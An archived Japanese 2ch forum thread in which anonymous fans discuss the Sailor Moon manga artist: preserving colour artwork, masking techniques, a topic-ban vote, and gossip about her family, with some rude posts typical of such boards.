退色は絶対起きるけど保管を
密閉暗所保存したら外に晒すよりは長生き

149 :花と名無しさん:2006/11/05(日) 20:17:30 ID:???O
>>148
スゲエ!ありがとうございます。
肌色に蛍光ピンク使うとかキレイそうだ(*´∀`)
密閉っていうのは袋に入れれば良いんですかね


何かスレ違いな書き込みばかりすいません('A`)

150 :花と名無しさん:2006/11/05(日) 21:17:03 ID:???0
そうですね>保管
とにかく光と空気に晒さないことが重要
デジタルが多くなってる今、
アナログで取り組んでいる人がいると応援したくなる
いろいろ研究してみてください


姫の絵といえばレースペーパーをマスキングにして
ラブリーな背景を作るのが好きだったなぁ
そういう手法を初めて見たのが姫のだったけど
あれは姫がパイオニアだったの?
誰か教えてエロイ人

151 :花と名無しさん:2006/11/05(日) 22:37:39 ID:???0
>マスキング
別にパイオニアではなかったと思うなあ。
あの当時色んな所で見る手法だっだし。

152 :花と名無しさん:2006/11/06(月) 23:21:12 ID:???0
..........

153 :花と名無しさん:2006/11/08(水) 20:21:09 ID:???0
どーしてアタシの話題がいけないのー?そんなにアタシのことがキライなのー?(月野うさぎ 談)

154 :花と名無しさん:2006/11/08(水) 21:43:55 ID:???0
アタシ男キモッ

155 :花と名無しさん:2006/11/16(木) 03:43:22 ID:???0
実は前回の話し合いによるセラムンネタ禁止期間の半年は、
今月12日をもって満了となったわけだが。

このまま禁止期間を延長するかどうかの審議に入りたい。

自分は禁止期間延長に1票。

156 :花と名無しさん:2006/11/16(木) 08:56:33 ID:???0
もうそんな時期か。というか終わってたんだ。
折角終わってるっていうのに
あの血の気の多い言葉の乱暴な人たちはどこ行ったんだろう?


案としては以下があるかな

・当初の予定通り再統合
・禁止期間延長:再度期間決定
・禁止期間延長:無期限
・禁止期間延長:セラムンスレが埋まるまで


自分はどれでもいいや

157 :花と名無しさん:2006/11/16(木) 10:35:13 ID:???0
無期限希望。
それか毎年1年更新で12月になったらその都度の様子を見て会議。

158 :花と名無しさん:2006/11/16(木) 14:47:51 ID:???0
美少女戦士セーラームーン
http://comic6.2ch.net/test/read.cgi/rcomic/1147389761/

当面は↑のスレが埋まるまで禁止期間延長ってのが方針でいいんじゃないかな。
↑のスレが残ってるのに統合したら板に迷惑かけてる感じだし。


159 :花と名無しさん:2006/11/17(金) 09:59:25 ID:???O
他に意見ないかい?

160 :花と名無しさん:2006/11/17(金) 10:36:16 ID:???O
しきり厨がしゃべらなくなったので静かになったんだな。
よくわかる。

161 :花と名無しさん:2006/11/17(金) 16:44:16 ID:???0
とりあえずセラムンスレ消費まで延長して
埋まる頃に再度議論ってことにしますか?

でもそれって単なる先延ばしなんで
今決めちゃう方がいいですかね?

162 :名無しゲノムのクローンさん :2006/11/18(土) 00:10:17 ID:???0
20日(月)発売の「サンデー毎日」12/3号から
⇒発覚スクープ!慶應義塾大学と共立薬科大学が2008年に合併へ!
http://www.mainichi.co.jp/syuppan/sunday/top.jpg

共立薬科卒で
薬剤師としてではなく、臨床検査技師として
慶應病院に勤務してた
武内先生にとっては
夢のやうな朗報でつネ !!


163 :花と名無しさん:2006/11/18(土) 12:31:11 ID:???0
もうこの人の漫画で語ることはないってことだ。

164 :花と名無しさん:2006/11/18(土) 14:08:37 ID:???O
それは誰かが決めることではないよ。

とりあえずセーラムーンのスレが埋まるまでに賛成

165 :花と名無しさん:2006/11/18(土) 18:24:30 ID:7d5X6AUdO
ジュピター

166 :花と名無しさん:2006/11/18(土) 19:26:50 ID:IRFWeu2u0
青春のバカヤローーーーーーーーー
ーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーー!!!!!!

167 :花と名無しさん:2006/11/18(土) 19:53:58 ID:???0
もう風俗店開業のネタでも描くしかないよ。

168 :花と名無しさん:2006/11/21(火) 10:43:08 ID:???0
ヒロインを助ける謎のヒーローの名前が「タキシード仮面」。このレベルのネーミングセンスを持つ作家が少女漫画界に何人いるだろうか?

169 :花と名無しさん:2006/11/22(水) 01:12:27 ID:???0
イメージは東山なんだけどねえ。

170 :花と名無しさん:2006/11/23(木) 08:42:26 ID:???0
東山がカレーのCMでタキシード仮面の格好をしたのはセラムン発表後のはずだが。

171 :花と名無しさん:2006/11/23(木) 15:11:07 ID:???0
それを姫が喜んでいたと書いていたな。

172 :花と名無しさん:2006/11/30(木) 00:42:04 ID:???0
東山は若いな。
さすがプリンス。

173 :花と名無しさん:2006/12/07(木) 14:40:19 ID:???0
プチ王子、幼稚舎合格ってマジ?

174 :花と名無しさん:2006/12/11(月) 17:14:03 ID:4BlwA27Q0
ときめか・・・・つづきがよみたいよ(´ロ`)
2巻みたいよ(´・ω・)

175 :花と名無しさん:2006/12/12(火) 23:46:43 ID:???0
2巻、今年中に出ると思ってたのに…

176 :花と名無しさん:2006/12/21(木) 11:41:03 ID:???0
武内先生にはクローン技術で美幼女体を製造し、脳など神経系統を移植して
美少女に生まれ変わって、新鮮な感覚でもう一度漫画を描いてもらいたい。

177 :花と名無しさん:2006/12/21(木) 12:09:56 ID:???0
そんなサターンじゃあるまいし

178 :花と名無しさん:2006/12/24(日) 12:23:38 ID:???0
ひねくれた心は元にもどらないよ。

179 :花と名無しさん:2006/12/26(火) 16:09:43 ID:???0
武内センセって赤ちゃんはコウノトリが運んでくるとか信じていそう。

180 :花と名無しさん:2006/12/26(火) 18:19:46 ID:???0
バカ?

181 :花と名無しさん:2006/12/26(火) 19:57:36 ID:???0
いや、そこまで断言してないけど。

182 :花と名無しさん:2006/12/27(水) 12:02:54 ID:???0
じゃあ、王子は姫が寝ている間に枕元に置いてあったのか。

まぁ、姫はイメージ的に全身麻酔で生んでそうだから、
「まぁ、気がついたら赤ちゃんが!」でもあり得そうなキャラだけど。

183 :花と名無しさん:2006/12/30(土) 22:01:53 ID:???0
さりげなくエロイシーンに違和感が無くて良いね


184 :花と名無しさん:2006/12/31(日) 01:45:20 ID:???0
ttp://www.aist.go.jp/no_header/kyouryu.html


185 :花と名無しさん:2007/01/03(水) 15:26:08 ID:xesejTZnO


186 :花と名無しさん:2007/01/03(水) 15:51:43 ID:Kxgp2kOeO
この人はマジでセーラームーンは勇者シリーズにかなうとでも思ってんの?つーか勇者シリーズにいちゃもんつけてんじゃねーよ!氏ねボケ!!

187 :花と名無しさん:2007/01/03(水) 17:27:20 ID:???0
ソースつけてkwsk

188 :花と名無しさん:2007/01/06(土) 08:35:36 ID:bHRuSXNVO
どうせこの人って男女差別に反感もってるバカ女なんでしょ

189 :花と名無しさん:2007/01/06(土) 18:00:34 ID:???0
最初は全くそう感じなかったんだけど。
長期かするうちに、この作品で儲けたい連中が
そういう思想を利用するようになっていった感じがしなくもない。
それがかえって変な雰囲気にしてしまったというか。

190 :花と名無しさん:2007/01/07(日) 14:29:47 ID:???0
>>173
お受験板でも見たけど、ソースはどこ?
なんか、正直幼稚舎も変わったなと思う・・・

191 :花と名無しさん:2007/01/18(木) 16:42:53 ID:???0
>>182
千秋もそんな話してたね


192 :花と名無しさん:2007/01/21(日) 14:17:32 ID:ABdeAtqhO
セーラームーンは勇者シリーズにはかなわない

193 :花と名無しさん:2007/01/22(月) 01:19:39 ID:???O
セラムンスレ落ちてるけど、どうしょう…?

194 :花と名無しさん:2007/01/22(月) 01:21:59 ID:???0
落ちてないけど
http://comic7.2ch.net/test/read.cgi/rcomic/1147389761/

195 :花と名無しさん:2007/01/23(火) 17:02:43 ID:???O
あ、スマソ。
逝ってくる…orz



39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)